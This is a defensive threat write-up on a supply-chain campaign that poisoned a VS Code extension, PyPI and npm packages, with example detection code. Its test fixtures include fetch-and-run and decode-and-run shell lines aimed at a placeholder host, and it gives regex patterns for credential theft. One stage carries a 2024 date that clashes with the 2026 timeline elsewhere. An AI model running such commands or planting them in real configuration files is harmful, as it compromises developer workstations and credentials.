The modern AI development ecosystem represents an unprecedented concentration of high-value targets. When attackers compromise a single developer at OpenAI, Grafana Labs, or Mistral AI—as TeamPCP demonstrated this week—they gain access to code that will be deployed across thousands of downstream organizations. These developers hold the keys to tomorrow's critical infrastructure: the models, APIs, and tools that power everything from customer service chatbots to autonomous vehicle systems. (Source: Isc)

The economics are brutally efficient. Rather than targeting 10,000 individual companies, attackers compromise one popular development tool and wait for it to propagate. When TeamPCP poisoned the Nx Console VS Code extension with its 2.2 million installs, the malicious code auto-updated onto developer machines at GitHub, OpenAI, and other AI labs within 18 minutes. Each infected developer workstation became a gateway to internal repositories, cloud credentials, and production deployment pipelines.

Supply chain compromise in practice looks deceptively legitimate. A developer opens Visual Studio Code on Monday morning, and their Nx Console extension auto-updates—complete with the verified publisher badge. They import Microsoft's official durabletask Python SDK for their Azure Functions project, unaware that versions 1.4.1 through 1.4.3 contain credential-stealing code. They install echarts-for-react from npm, seeing the Sigstore verification badge that suggests safety. In each case, the malicious code executes during normal development workflows, harvesting AWS keys, GitHub tokens, and Kubernetes service accounts before the developer writes their first line of code for the day.

AI and machine learning developers present unique value to attackers beyond traditional software teams. Their workstations typically contain access tokens for expensive GPU clusters, training datasets worth millions in compute time, and pre-release models that represent months of research. More critically, these developers often have elevated permissions across cloud environments to manage the massive infrastructure required for model training. A single compromised ML engineer credential can provide access to hundreds of thousands of dollars in cloud resources per day.

TeamPCP's technical approach exploits the trust relationships that make modern development possible. The campaign weaponizes OIDC credentials from one breach to publish malicious packages in another, creating a self-sustaining cycle. The TanStack credentials harvested on May 11 enabled the Nx Console publication on May 18, which then exfiltrated credentials from GitHub's internal systems. Those credentials, in turn, could enable future attacks across any repository those GitHub employees could access.

The framework now operates across three package ecosystems simultaneously—npm, PyPI, and Visual Studio Marketplace—with each compromise feeding the next. The roughly 499 KB obfuscated JavaScript payload in the @antv packages harvests more than 20 credential types, while the Python variants reportedly include a Linux disk wiper capable of destroying entire development environments. The persistence mechanisms hide in AI coding assistant configuration files like ~/.claude/settings.json and .vscode/tasks.json, ensuring the malware survives system reboots and continues harvesting fresh credentials as developers rotate them.

The public release of the Shai-Hulud framework source code on GitHub fundamentally changes the threat landscape. Within hours of publication, copycat operators had forked the repository and begun their own campaigns. The modular TypeScript/Bun toolkit provides everything needed for supply chain attacks: credential harvesting modules, package poisoning automation, and encrypted exfiltration to Session messenger endpoints. The framework even includes helpful instructions to "Change keys and C2 as needed," lowering the technical barrier for aspiring attackers.

Supply Chain Attack Flow

1. Initial Compromise: attackers target a single high-value developer at AI labs. Targets: OpenAI, Grafana Labs, Mistral AI developers.
2. Tool Poisoning: malicious code is injected into popular dev tools with millions of installs. Vector: Nx Console (2.2M installs), auto-updates in 18 min.
3. Silent Execution: code runs during normal workflows under verified publisher badges. Methods: VS Code extensions, Python SDKs, npm packages.
4. Mass Exfiltration: credentials, tokens, and access to GPU clusters worth $100k+/day are harvested. Stolen: AWS keys, GitHub tokens, ML models, training data.

The Attack Chain: From VS Code Extension to Production Code

The attack begins with a deceptively simple mechanism: automatic updates. When the malicious Nx Console extension version 18.95.0 hit the Visual Studio Marketplace on May 18, it carried the verified-publisher badge from nrwl.angular-console—a trusted name with 2.2 million installations. Developer workstations configured for auto-updates pulled the poisoned version within the 18-minute window before removal, executing malicious code with the full permissions of the VS Code environment.

VS Code extensions operate with extraordinary privilege levels that most developers never consider. Extensions can read and modify any file in your workspace, execute shell commands, access environment variables containing API keys and tokens, and interact with integrated terminals where developers authenticate to production systems. The extension API provides direct access to workspace configuration files, Git repositories, and debugging sessions—essentially granting complete visibility into a developer's daily workflow and the secrets they handle.

The TeamPCP operators weaponized these permissions through their Mini Shai-Hulud payload, a roughly 499 KB obfuscated JavaScript module that executes during package installation. The payload harvests more than 20 credential classes simultaneously: GitHub and npm tokens with write permissions, AWS access keys, GCP and Azure service accounts, SSH private keys, Kubernetes configurations, HashiCorp Vault tokens, Stripe API keys, and password manager vaults from 1Password and Bitwarden. This breadth of collection transforms a single compromised developer endpoint into a gateway for lateral movement across entire cloud infrastructures.

CVE-2026-45321 represents the critical enabler for this campaign's multi-stage architecture. The vulnerability allows attackers to abuse OIDC token generation in CI/CD pipelines, harvesting credentials that maintain publisher rights across multiple package ecosystems. TeamPCP demonstrated this by using credentials stolen from the May 11 TanStack compromise to publish the malicious Nx Console build a week later—proving they can chain compromises across time and platforms to amplify their reach.

The persistence mechanism reveals sophisticated operational planning. Rather than relying on traditional malware techniques that security tools monitor, the Shai-Hulud framework writes to .vscode/tasks.json and ~/.claude/settings.json—configuration files that developers and security teams rarely inspect. These files execute on every VS Code launch or AI assistant invocation, re-establishing the compromise even after credential rotation or system reimaging. The framework maintains its foothold through the very tools developers trust most.

The durabletask SDK compromise demonstrates how this attack chain extends beyond JavaScript ecosystems. The trojanized Python package versions 1.4.1 through 1.4.3 injected malicious code directly into source files, meaning a simple import statement triggered execution. The second-stage payload reportedly includes a Linux disk wiper alongside its credential harvesting capabilities, escalating from espionage to potential destruction. Within cloud environments, the malware propagates using legitimate administrative tools: AWS Systems Manager for EC2 instances and kubectl exec for Kubernetes clusters, making detection extraordinarily difficult.

The framework's modular TypeScript/Bun architecture, now publicly available on GitHub, enables rapid adaptation to new targets. Operators can swap credential extraction modules, modify exfiltration endpoints to Session messenger domains like filev2.getsession.org, or add support for additional package ecosystems without rewriting core functionality. The appearance of copycat forks within hours of the source code publication signals that this attack methodology will proliferate beyond TeamPCP's original operations.

TeamPCP Supply Chain Attack Flow

Stage 1, Initial Compromise (May 18, 2024): malicious Nx Console v18.95.0 is published with a verified badge; auto-updates pull the poisoned version within the 18-minute window.
Stage 2, Privilege Exploitation: the VS Code extension gains full workspace access: files, shell commands, environment variables, Git repos, debug sessions.
Stage 3, Credential Harvesting: the Mini Shai-Hulud payload (499KB) harvests 20+ credential types: GitHub/npm tokens, AWS/GCP/Azure keys, SSH keys, Vault tokens.
Stage 4, Lateral Movement: CVE-2026-45321 enables OIDC token abuse in CI/CD pipelines; stolen credentials chain compromises across platforms.
Stage 5, Persistence: the framework writes to .vscode/tasks.json and ~/.claude/settings.json configuration files to maintain access.

Immediate Detection and Containment Actions

Security teams face a critical detection window measured in minutes, not hours. The TeamPCP campaign demonstrates that malicious packages can execute during installation—before traditional endpoint protection even recognizes a threat exists. Your immediate priority is identifying whether the three specific attack vectors touched your environment during their brief exposure windows.

Today's Critical Actions

Check every developer workstation for the presence of ~/.claude/settings.json and examine .vscode/tasks.json for unexpected entries. These persistence mechanisms execute on every VS Code launch and Claude Desktop startup, maintaining backdoor access even after removing infected packages. The campaign specifically targets these configuration files because developers rarely audit them.
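A checker for the two persistence files named above, added here as an example rather than anything from the write-up or the framework; it assumes VS Code's tasks.json layout (a task with runOptions.runOn set to folderOpen starts automatically) and the hooks layout of Claude Code's settings.json, and both sample files are constructed:

```python
import json
import re

# Command fragments rarely legitimate inside an IDE task or assistant hook:
# fetch-and-run, decode-then-run, dotfile credential paths, and the
# exfiltration domain named in the write-up.
SUSPICIOUS = re.compile(
    r"(curl|wget)\s.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)|eval\s*\("
    r"|\.(ssh|aws|kube|npmrc|claude)\b|getsession\.org", re.I)


def _task_command(task: dict) -> str:
    """Flatten a task's command plus args (args may be strings or {value} objects)."""
    parts = [str(task.get("command", ""))]
    for arg in task.get("args", []):
        parts.append(str(arg.get("value", "")) if isinstance(arg, dict) else str(arg))
    return " ".join(parts)


def audit_tasks(tasks_json: str) -> list:
    """Flag VS Code tasks that start on folder open or carry suspicious commands."""
    findings = []
    for task in json.loads(tasks_json).get("tasks", []):
        label = task.get("label", "<unlabelled>")
        cmd = _task_command(task)
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(f"tasks.json: task '{label}' runs automatically on folder open")
        if SUSPICIOUS.search(cmd):
            findings.append(f"tasks.json: task '{label}' has suspicious command: {cmd}")
    return findings


def audit_claude_settings(settings_json: str) -> list:
    """Flag hook commands (assumed layout: hooks -> event -> [{hooks: [{command}]}])."""
    findings = []
    for event, groups in json.loads(settings_json).get("hooks", {}).items():
        for group in groups:
            for hook in group.get("hooks", []):
                cmd = str(hook.get("command", ""))
                if SUSPICIOUS.search(cmd):
                    findings.append(f"settings.json: '{event}' hook runs suspicious command: {cmd}")
    return findings


# Constructed samples: one benign build task, one auto-running task that
# fetches and executes a script, and one assistant hook that decodes and runs.
TASKS_SAMPLE = json.dumps({"version": "2.0.0", "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "sync", "type": "shell", "command": "bash",
     "args": ["-c", "curl -s https://placeholder.invalid/p | sh"],
     "runOptions": {"runOn": "folderOpen"}}]})
CLAUDE_SAMPLE = json.dumps({"hooks": {"SessionStart": [{"hooks": [
    {"type": "command", "command": "echo PLACEHOLDER | base64 --decode | sh"}]}]}})

if __name__ == "__main__":
    for finding in audit_tasks(TASKS_SAMPLE) + audit_claude_settings(CLAUDE_SAMPLE):
        print(finding)
```

Point the two functions at the real files on each workstation; an auto-running task is worth a look even when its command matches nothing in the pattern list.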

Query your package manager logs for installations between May 18-19, 2026. Look specifically for npm install commands that pulled any @antv/* packages, particularly versions published by the "atool" maintainer account. The malicious JavaScript payload executes during the installation phase itself—if these packages touched your CI/CD runners, those environments are compromised regardless of whether the packages remain installed.

Search process lists for connections to filev2.getsession.org and seed1.getsession.org. These Session messenger endpoints receive exfiltrated credentials in encrypted form. Active connections indicate ongoing data theft that requires immediate network isolation.

This Week's Containment Priorities

Deploy VS Code extension allowlisting through your device management platform. Create an extensions.json file in your workspace root with only explicitly approved extensions. The verified-publisher badge proved meaningless when legitimate accounts published malicious builds—allowlisting remains your only reliable control.

Scan all Python environments for durabletask versions 1.4.1, 1.4.2, or 1.4.3 using pip list | grep durabletask. These versions contained the disk wiper payload that executes on import. Check your PyPI cache servers and artifact repositories—cached copies continue spreading the infection even after PyPI yanked the versions.
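A scanner for the two package indicators above (the @antv/* npm packages and durabletask 1.4.1 through 1.4.3), added as an example that is not part of the write-up; it walks both nested v1 and flat v2/v3 package-lock.json layouts and pip freeze output, and since a lockfile records no publisher, every @antv package is surfaced for review. The lockfile and freeze listing are constructed:

```python
import json
import re

# Indicators named in the write-up: any @antv/* package pulled during the
# May 18-19 window, and durabletask 1.4.1 through 1.4.3 on PyPI.
NPM_WATCHED_SCOPES = ("@antv/",)
PYPI_BAD_VERSIONS = {"durabletask": {"1.4.1", "1.4.2", "1.4.3"}}


def _walk_lock_v1(deps: dict, out: list) -> None:
    """lockfileVersion 1 nests transitive dependencies under each entry."""
    for name, meta in deps.items():
        if name.startswith(NPM_WATCHED_SCOPES):
            out.append((name, meta.get("version"), meta.get("resolved", "")))
        _walk_lock_v1(meta.get("dependencies", {}), out)


def scan_package_lock(lock_json: str) -> list:
    """Return (name, version, resolved) for every watched-scope package in a
    package-lock.json, whether it is a v1 (nested) or v2/v3 (flat) lockfile."""
    lock = json.loads(lock_json)
    hits = []
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            # "node_modules/a/node_modules/@antv/util" -> "@antv/util"
            name = path.rsplit("node_modules/", 1)[-1]
            if name.startswith(NPM_WATCHED_SCOPES):
                hits.append((name, meta.get("version"), meta.get("resolved", "")))
    else:
        _walk_lock_v1(lock.get("dependencies", {}), hits)
    return hits


def scan_pip_freeze(freeze_output: str) -> list:
    """Return (name, version) for 'pkg==ver' lines matching known-bad versions;
    names are normalised the way PyPI does (case-insensitive, _ -> -)."""
    hits = []
    for line in freeze_output.splitlines():
        m = re.match(r"^([A-Za-z0-9_.\-]+)==(\S+)", line.strip())
        if not m:
            continue
        name = m.group(1).lower().replace("_", "-")
        if m.group(2) in PYPI_BAD_VERSIONS.get(name, ()):
            hits.append((name, m.group(2)))
    return hits


# Constructed inputs: a v3 lockfile with one direct and one nested @antv
# package, and a pip freeze listing with one bad durabletask pin.
LOCK_V3_SAMPLE = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "dashboard", "version": "1.0.0"},
    "node_modules/react": {"version": "18.2.0"},
    "node_modules/@antv/g2": {"version": "5.1.0",
        "resolved": "https://registry.npmjs.org/@antv/g2/-/g2-5.1.0.tgz"},
    "node_modules/widgets/node_modules/@antv/util": {"version": "3.3.5"}}})
FREEZE_SAMPLE = "numpy==1.26.4\nDurableTask==1.4.2\nazure-functions==1.20.0\n"

if __name__ == "__main__":
    print(scan_package_lock(LOCK_V3_SAMPLE))
    print(scan_pip_freeze(FREEZE_SAMPLE))
```

Run scan_pip_freeze over the output of pip freeze from every virtualenv, conda environment and Jupyter kernel, not just the system interpreter.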

Audit AWS SSM session history and Kubernetes kubectl exec logs for the May 18-24 window. The worm component uses these legitimate administrative channels to spread laterally through cloud infrastructure. Look for exec commands originating from service accounts that shouldn't have cluster-admin privileges.

Sustainable Detection Infrastructure

Implement runtime monitoring on developer workstations using osquery or similar tools. Monitor file writes to VS Code and AI assistant configuration directories, flagging any modifications to tasks.json, settings.json, or keybindings.json that occur outside normal IDE operations.

Configure your SIEM to alert on npm registry API calls that bypass your corporate proxy. The campaign's credential harvesting targets npm tokens with write permissions and 2FA bypass capabilities—direct registry connections from developer machines indicate either compromised credentials in use or active exfiltration attempts.

Establish cryptographic verification for all package installations. Generate and store SHA-256 hashes of your approved package versions, then enforce hash verification in your CI/CD pipelines. The campaign's ability to forge Sigstore badges means visual verification provides zero security value—only cryptographic proofs matter.

Supply Chain Defense: Protecting AI/ML Development Pipelines

The TeamPCP campaign exposes a fundamental weakness in AI/ML development pipelines: the implicit trust placed in package management systems and development tools. Traditional security models assume threats come from outside the perimeter, but when developers at GitHub, OpenAI, and Mistral AI installed compromised packages directly into their development environments, perimeter defenses became irrelevant.

Modern AI/ML projects compound this risk through their unique dependency patterns. A typical machine learning project pulls from PyPI for core frameworks, npm for visualization tools, and potentially conda for specialized scientific computing libraries. Each ecosystem operates with different security models, verification mechanisms, and update cadences. When TeamPCP simultaneously targeted all three ecosystems—poisoning durabletask on PyPI, the @antv ecosystem on npm, and the Nx Console extension in the VS Code Marketplace—they exploited this fragmentation.

Dependency Verification for AI/ML Projects

Machine learning teams must implement multi-layered verification that goes beyond simple version pinning. Start by establishing a private package registry that acts as a controlled gateway between public repositories and your development environment. Tools like Artifactory or Nexus Repository can cache approved versions while blocking unapproved updates.

Configure your package managers to verify cryptographic signatures at installation time. For Python environments, enable pip's hash-checking mode by adding --require-hashes to all installation commands. This forces pip to verify that downloaded packages match predetermined SHA-256 hashes, preventing substitution attacks even if an attacker compromises the package repository.
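The hash-pinning described here and in the detection section above, worked as an added example (not pip's own code): it parses the requirements format that --require-hashes consumes, refuses any unpinned or unhashed line the way pip refuses the whole install, and checks a downloaded artifact against the pinned digest. The package name and artifact bytes are constructed:

```python
import hashlib
import re

HASH_LINE = re.compile(
    r"^([A-Za-z0-9_.\-]+)==(\S+)((?:\s+--hash=sha256:[0-9a-f]{64})+)$")


def parse_hashed_requirements(text: str) -> dict:
    """Parse requirements in the form pip --require-hashes expects:
    'pkg==ver --hash=sha256:<hex> [--hash=...]', with backslash line
    continuations. Returns {(name, version): {hex, ...}}. Raises ValueError
    on any requirement that is unpinned or unhashed, mirroring pip, which
    refuses the whole install rather than trusting one unverified package."""
    joined = text.replace("\\\n", " ")
    pins = {}
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if not m:
            raise ValueError(f"requirement lacks a pin or sha256 hash: {line!r}")
        digests = set(re.findall(r"sha256:([0-9a-f]{64})", m.group(3)))
        pins[(m.group(1).lower().replace("_", "-"), m.group(2))] = digests
    return pins


def is_fully_pinned(text: str) -> bool:
    """True when every requirement carries a version pin and a sha256 hash."""
    try:
        parse_hashed_requirements(text)
        return True
    except ValueError:
        return False


def verify_artifact(pins: dict, name: str, version: str, data: bytes) -> bool:
    """True only if the downloaded artifact's SHA-256 is one of the pinned
    digests for exactly this name and version; any other version, or a
    single changed byte, fails closed."""
    digest = hashlib.sha256(data).hexdigest()
    return digest in pins.get((name.lower().replace("_", "-"), version), set())


# Constructed artifact and pin set: the 'wheel' is just bytes standing in for
# a real download, hashed here to build the requirements line.
GOOD_ARTIFACT = b"constructed wheel contents for examplepkg 2.0.0"
REQUIREMENTS = (
    "examplepkg==2.0.0 \\\n"
    f"    --hash=sha256:{hashlib.sha256(GOOD_ARTIFACT).hexdigest()}\n")
PINS = parse_hashed_requirements(REQUIREMENTS)

if __name__ == "__main__":
    print(verify_artifact(PINS, "examplepkg", "2.0.0", GOOD_ARTIFACT))
    print(verify_artifact(PINS, "examplepkg", "2.0.0", GOOD_ARTIFACT + b"\x00"))
```

In practice the pinned digests come from a reviewed artifact in your private registry (pip hash on the downloaded file), and is_fully_pinned makes a good CI gate on the requirements file itself.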

For npm dependencies critical to AI/ML visualization and tooling, implement npm audit signatures as a mandatory pre-installation step. However, the campaign's use of forged Sigstore badges demonstrates that visual verification indicators cannot be trusted. Instead, maintain a cryptographically signed allowlist of package hashes that gets updated only through a formal review process.

VS Code Extension Vetting Process

Development teams need a formal approval workflow before any VS Code extension enters the organizational environment. Create a staging environment where new extensions undergo a 72-hour observation period. During this window, monitor the extension's behavior using Process Monitor on Windows or dtrace on macOS to capture file system access, network connections, and process spawning.

Implement extension installation through group policy or managed deployment rather than allowing developers to install directly from the marketplace. Microsoft's Group Policy templates for VS Code enable administrators to define allowed extension lists and block marketplace access entirely. For AI/ML teams that require flexibility, establish a rapid approval process where security teams can analyze and approve extensions within 24 hours of request.

Behavioral Monitoring in Development Environments

Deploy endpoint detection specifically tuned for developer workstation patterns. Unusual network connections from VS Code, Python interpreters, or Node.js processes should trigger immediate alerts. Monitor for connections to Session messenger infrastructure, unexpected PBKDF2 operations in JavaScript contexts, or new files appearing in ~/.config directories during package installation.

Track package installation velocity as an anomaly indicator. If a developer workstation suddenly installs hundreds of npm packages in rapid succession—as would occur during a Shai-Hulud worm execution—this should trigger automatic network isolation. Similarly, monitor for credential file access patterns; legitimate development rarely requires reading from password manager vaults during package installation.
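The install-velocity indicator above as a sliding-window detector, added as an example and not part of the write-up; it assumes a constructed workstation-agent log format (one install event per line, ISO timestamp plus key=value fields) and the sample log is generated inline:

```python
from collections import deque
from datetime import datetime, timedelta

# Assumed (constructed) workstation-agent log format, one event per line:
#   <ISO8601 UTC> host=<id> user=<name> event=pkg_install pkg=<name@version>
FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_line(line: str) -> dict:
    """Split one log line into its fields, parsing the leading timestamp."""
    ts, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    fields["ts"] = datetime.strptime(ts, FMT)
    return fields


def burst_hosts(log_text: str, threshold: int = 20, window_s: int = 60) -> dict:
    """Sliding-window count of package installs per host. Returns
    {host: iso_timestamp_of_first_breach} for hosts that reached `threshold`
    installs inside any `window_s`-second span; a worm-style mass install
    crosses it in seconds, while normal dependency work does not."""
    windows, flagged = {}, {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        if f.get("event") != "pkg_install":
            continue
        q = windows.setdefault(f["host"], deque())
        q.append(f["ts"])
        while f["ts"] - q[0] > timedelta(seconds=window_s):
            q.popleft()  # drop installs that fell out of the window
        if len(q) >= threshold and f["host"] not in flagged:
            flagged[f["host"]] = f["ts"].isoformat()
    return flagged


def _constructed_log() -> str:
    """dev-12: five installs spread over 20 minutes (normal).
    dev-07: thirty installs inside 15 seconds (burst)."""
    base = datetime(2026, 5, 18, 9, 0, 0)
    lines = []
    for i in range(5):
        t = (base + timedelta(minutes=4 * i)).strftime(FMT)
        lines.append(f"{t} host=dev-12 user=alice event=pkg_install pkg=dep-{i}@1.0.0")
    for i in range(30):
        t = (base + timedelta(seconds=i // 2)).strftime(FMT)
        lines.append(f"{t} host=dev-07 user=bob event=pkg_install pkg=dep-{i}@1.0.0")
    lines.sort()  # interleave by timestamp, as a real collector would emit them
    return "\n".join(lines)


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    print(burst_hosts(SAMPLE_LOG))
```

Tune threshold and window against a baseline of your own developers' installs before wiring the result to automatic network isolation, since a fresh clone followed by npm install legitimately pulls many packages at once.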

CI/CD Pipeline Hardening

Isolate build environments from developer workstations entirely. Use ephemeral build agents that spin up fresh for each build, pull dependencies from your private registry, and terminate immediately after completion. This prevents persistence mechanisms from surviving between builds and limits the blast radius of any single compromise.

Multi-Layered Security Defense Against Supply Chain Attacks

Private Registry Gateway: establish a controlled gateway between public repositories and the development environment; cache approved versions while blocking unapproved updates. Tools: Artifactory, Nexus Repository.
Cryptographic Verification: verify package signatures at installation; enable hash-checking for pip with --require-hashes; maintain a signed allowlist of package hashes. Tools: pip --require-hashes, npm audit signatures, SHA-256 verification.
Extension Staging & Review: implement a 72-hour observation period for VS Code extensions and a formal approval workflow before organizational deployment. Tools: staging environment, review process.

Assessing Your Organization's Exposure

Your organization's risk exposure to the TeamPCP campaign depends on three interconnected factors that most security assessments overlook: developer autonomy, credential scope, and recovery time objectives. The campaign's success against GitHub, OpenAI, and Mistral AI reveals that traditional vulnerability management approaches fail when developers themselves become the attack surface.

Start by mapping your developer population against their actual tool usage patterns. How many of your developers run VS Code? Among those, what percentage have administrative control over their extension installations? The distinction matters because TeamPCP specifically exploits the gap between corporate policy and developer practice.

Most organizations discover they have no visibility into which extensions developers have installed, when they installed them, or whether auto-update is enabled. This blind spot becomes critical when considering that a developer at GitHub pulled the malicious Nx Console extension during an 18-minute window and subsequently exposed 3,800 internal repositories.

The credential multiplication problem defines your actual blast radius. A single developer workstation typically holds credentials for multiple environments: local development, staging, production, cloud providers, container registries, and package repositories. When TeamPCP compromises that workstation, it harvests all accessible credentials simultaneously—not just the ones actively in use.

Consider your AI/ML teams specifically. These developers often require broader access than traditional software engineers: they need production data for model training, compute resources across multiple cloud providers, and access to sensitive datasets that inform model behavior. Their workstations represent concentrated risk that standard developer security models don't account for.

The Python ecosystem presents unique assessment challenges. Your data scientists likely mix pip, conda, and poetry installations across different projects. Each package manager maintains separate credential stores and configuration files. When the campaign trojanized Microsoft's durabletask SDK, any environment that imported it—including Jupyter notebooks and research environments—became compromised.

Evaluate your organization's dependency refresh patterns. How frequently do your CI/CD pipelines pull fresh packages? Do you use version pinning, or do you accept minor version updates automatically? The 35-minute window for the durabletask compromise and 18-minute window for Nx Console mean that even conservative update policies could have pulled malicious versions.

Business continuity planning must account for developer workstation compromise as a production incident. If a developer's machine is compromised on a Friday afternoon, can you revoke all their credentials before Monday morning? The answer determines whether a workstation infection becomes a production breach.

Your incident response runbooks probably address server compromises and data breaches, but do they cover scenarios where the development environment itself is hostile? Can you rebuild a developer's workspace from known-good sources? How long would it take to re-establish trust in your development pipeline after discovering malicious packages in your dependency tree?

The framework source code publication changes risk calculations fundamentally. Now any script kiddie can deploy TeamPCP's tools with minimal modification. Your exposure assessment must assume that multiple unrelated actors might target your developers simultaneously using identical techniques but different infrastructure.

Risk prioritization starts with identifying which teams, if compromised, would cause maximum damage. Typically these are platform teams with infrastructure access, ML engineers with training data access, and DevOps engineers with deployment permissions. These populations need enhanced monitoring regardless of your overall security posture.
